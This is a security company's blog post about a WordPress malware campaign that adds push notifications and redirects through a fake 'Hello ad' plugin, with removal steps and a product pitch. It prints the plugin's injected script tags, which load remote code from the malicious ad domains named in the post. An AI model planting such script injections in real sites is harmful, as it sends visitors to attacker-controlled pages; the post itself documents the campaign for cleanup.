911 Hack Removal

How to Fix Push Notification & Redirection Malware on WordPress

Updated on: June 12, 2020

How to Fix Push Notification & Redirection Malware on WordPress

Since the last couple of weeks, the security researchers at Astra have been tracking a push notifications malware on WordPress. This campaign has been combined with the on-going redirection campaign on WordPress websites.

A few malicious domains where redirection is happening include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com, justcannabis[.]online.

Hackers have gone one step ahead this time to make this hack campaign more sophisticated by installing a legitimate looking ‘Hello ad’ plugin to infected WordPress websites. More on it below.

Symptoms of the Push Notifications Malware – WordPress

  1. Vulgar Push Notifications: Visitors being shown malicious/vulgar push notifications when visiting your website:

    unknown push notifications  on WordPress websites malware

  2. Website Redirection: Website redirection to malicious pages on clicking links from our website (which ideally should go to pages within your WordPress)

    Malicious redirection and push notification in WordPress websites

    A few URLs where your website might be redirecting to include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com.

  3. Unknown Plugins Found: In some cases we’ve identified a new malicious plugin is added to the WordPress by the name of ‘Hello ad’.

  4. Device Specific/Mobile Only Virus: We’ve noticed that this malware hides itself really well. It won’t always send the push notifications or redirect users. The behavior is device-specific.


    Sometimes the malware shows push notifications only on mobile devices and sometimes it only redirects new users, not someone who has already opened the website earlier.

Curious Case of Malicious Hello Ad Plugin

We’ve seen ‘Hello ad’ plugin being added on these malicious websites to redirect users to hacker controlled websites.

This legitimate looking plugins adds the following malicious Javascript code to the page source:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
Push notifications malware on wordpress
Hello Ad plugin flagged by Astra Security’s malware scanner on an infected WordPress Website

The code added by this plugin plays an important role in making the redirection. Though, we’ve seen hackers are evolving and obfuscating this with each new campaign.

How to fix the Push Notifications Malware, Hello Ad & Redirection Hack Campaign

  1. Check the obvious places: Hackers have a few favorite places where they insert the virus/malware code. When starting to fix your WordPress, it’s best you start with these. The following files should be looked at first:
    • index.php
    • wp-content/themes/{themeName}/functions.php
    • wp-config.php
    • Core theme files
    • .htaccess

  2. Find & remove hello ad plugin: If you find this ‘legitimate looking’ plugin that you think your developer or you might have installed in the past – please un-install it as that’s not the case 🙂

  3. Removing Redirection: WordPress redirection attacks have been happening for months now. Taking care of malicious redirection hacks requires looking into the database tables, core theme files and sometimes your server’s configuration files too. Look for scripts/resources loaded from unknown URLs.

    Since redirection malware is so prevalent , we’ve made a detailed step-by-step video on fixing redirection hacks. Though hackers always keep on updating their methods to avoid coming on the radar of security companies, thee underlying principle is the same.


Hackers are always evolving their methods, exploiting vulnerabilities not known to the world and combining various exploits to create a hack. While removing the hack is one part, ensuring one never gets hacked requires something more permanent – like Astra’s Security suite 🙂

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security Suite before it’s too late.

Was this post helpful?

Tags: ,

Shikhil Sharma

Shikhil Sharma is the founder & CEO of Astra Web Security. Being involved with cybersecurity for over six years now, his vision is to make cyber security a 5-minute affair. Shikhil plays on the line between security and marketing.From time to time, he shares his knowledge on core cybersecurity topics on Astra’s blog. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football.
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany